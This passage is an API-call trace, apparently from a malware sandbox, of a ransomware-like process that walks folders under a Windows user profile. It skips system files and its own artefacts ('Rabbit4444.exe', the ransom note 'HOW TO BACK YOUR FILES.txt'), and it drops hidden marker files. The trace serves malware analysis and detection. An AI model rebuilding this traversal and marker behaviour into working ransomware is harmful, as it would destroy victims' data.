ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0066.377] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0066.377] lstrcpyW (in: lpString1=0x130ebfa, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0066.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0066.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11c3e8 [0066.377] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122168 [0066.377] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0066.377] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.377] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0066.378] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0066.378] lstrcpyW (in: lpString1=0x130ebfa, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0066.378] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0066.378] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xde) returned 0x126308 [0066.378] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122108 [0066.378] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0066.378] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0066.378] lstrcpyW (in: lpString1=0x130ebfa, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0066.378] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0066.378] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11bea8 [0066.378] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122288 [0066.378] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0066.378] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0066.378] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.379] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.379] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.379] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.380] CloseHandle (hObject=0x27c) returned 1 [0066.380] CloseHandle (hObject=0x228) returned 1 [0066.380] GetCurrentThreadId () returned 0xd98 [0066.380] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0066.380] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState" [0066.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bea8 | out: hHeap=0xe0000) returned 1 [0066.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0066.380] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState" [0066.380] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\" [0066.380] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0066.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.387] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.389] FlushFileBuffers (hFile=0x228) returned 1 [0066.390] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.390] CloseHandle (hObject=0x228) returned 1 [0066.391] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState") returned 106 [0066.391] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.391] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.391] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.391] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.391] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.391] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.391] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.391] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.391] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.391] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.391] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.391] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.391] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e575cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e575cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.391] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.391] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.391] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e575cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e575cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.392] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.392] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.392] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.392] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.393] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.393] CloseHandle (hObject=0x27c) returned 1 [0066.393] CloseHandle (hObject=0x228) returned 1 [0066.393] GetCurrentThreadId () returned 0xd98 [0066.393] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0066.393] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData" [0066.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126308 | out: hHeap=0xe0000) returned 1 [0066.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0066.393] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData" [0066.393] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\" [0066.393] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0066.393] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.395] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.397] FlushFileBuffers (hFile=0x228) returned 1 [0066.398] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.398] CloseHandle (hObject=0x228) returned 1 [0066.399] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData") returned 110 [0066.399] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.399] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0066.399] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.399] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.399] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.399] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.399] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.399] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.399] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.399] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.399] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.399] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.399] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e575cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e575cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.400] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.400] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.400] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e575cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e575cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e575cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.400] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0066.400] lstrcpyW (in: lpString1=0x130ec16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.400] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.400] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.401] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.401] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.401] CloseHandle (hObject=0x27c) returned 1 [0066.401] CloseHandle (hObject=0x228) returned 1 [0066.401] GetCurrentThreadId () returned 0xd98 [0066.401] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0066.401] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings" [0066.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c3e8 | out: hHeap=0xe0000) returned 1 [0066.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0066.401] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings" [0066.401] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\" [0066.401] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0066.401] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 